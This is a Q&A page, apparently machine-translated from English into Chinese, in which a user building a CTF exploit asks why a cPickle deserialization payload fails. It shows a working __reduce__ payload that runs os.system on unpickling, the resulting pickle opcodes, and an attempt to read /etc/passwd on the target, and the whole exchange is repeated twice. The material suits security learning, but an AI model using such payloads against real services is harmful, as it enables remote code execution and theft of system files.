序列化不适用于 cPickle
Serialization not working with cPickle
我正在尝试为 CTF 执行 cPickle 反序列化。我正在研究反序列化漏洞的利用,试图生成一个 python class 反序列化时将 运行 服务器上的命令,遵循以下示例:https://lincolnloop.com/blog/playing-pickle-security/
import os
import cPickle
# Exploit that we want the target to unpickle
class Exploit(object):
def __reduce__(self):
return (os.system, ('ls',))
shellcode = cPickle.dumps(Exploit())
print shellcode
问题是我试图利用的服务器不包含 "os" 或 "subprocess" 模块,所以我无法 运行 shell 命令。我正在尝试读取包含使用以下代码生成的对象的本地文件:
class Exploit(object):
def __reduce__(self):
data = open("/etc/passwd", "rb").read()
return data
shellcode = cPickle.dumps(Exploit()) print shellcode
但是当我尝试 运行 它生成负载时,它会尝试读取我的本地 /etc/passwd 文件并失败并显示错误消息:
shellcode = cPickle.dumps(Exploit())
cPickle.PicklingError: Can't pickle <main.Exploit object at
0x7f14ef4b39d0>: attribute lookup main.root:x:0:0:root:/root:/b
in/sh (/etc/passwd continues)
当我 运行 第一个示例时,它成功生成了以下泡菜(并且没有尝试在我的机器上执行 ls):
cposix
system
p1
(S'ls'
p2
tp3
Rp4
.
那为什么我的代码不工作?
"Whenever you try to pickle an object, there will be some properties that may not serialize well. For instance, an open file handle In this cases, pickle won't know how to handle the object and will throw an error."
What's the exact usage of __reduce__ in Pickler
我正在尝试为 CTF 执行 cPickle 反序列化。我正在研究反序列化漏洞的利用,试图生成一个 python class 反序列化时将 运行 服务器上的命令,遵循以下示例:https://lincolnloop.com/blog/playing-pickle-security/
import os
import cPickle
# Exploit that we want the target to unpickle
class Exploit(object):
def __reduce__(self):
return (os.system, ('ls',))
shellcode = cPickle.dumps(Exploit())
print shellcode
问题是我试图利用的服务器不包含 "os" 或 "subprocess" 模块,所以我无法 运行 shell 命令。我正在尝试读取包含使用以下代码生成的对象的本地文件:
class Exploit(object):
def __reduce__(self):
data = open("/etc/passwd", "rb").read()
return data
shellcode = cPickle.dumps(Exploit()) print shellcode
但是当我尝试 运行 它生成负载时,它会尝试读取我的本地 /etc/passwd 文件并失败并显示错误消息:
shellcode = cPickle.dumps(Exploit())
cPickle.PicklingError: Can't pickle <main.Exploit object at 0x7f14ef4b39d0>: attribute lookup main.root:x:0:0:root:/root:/b in/sh (/etc/passwd continues)
当我 运行 第一个示例时,它成功生成了以下泡菜(并且没有尝试在我的机器上执行 ls):
cposix
system
p1
(S'ls'
p2
tp3
Rp4
.
那为什么我的代码不工作?
"Whenever you try to pickle an object, there will be some properties that may not serialize well. For instance, an open file handle In this cases, pickle won't know how to handle the object and will throw an error."
What's the exact usage of __reduce__ in Pickler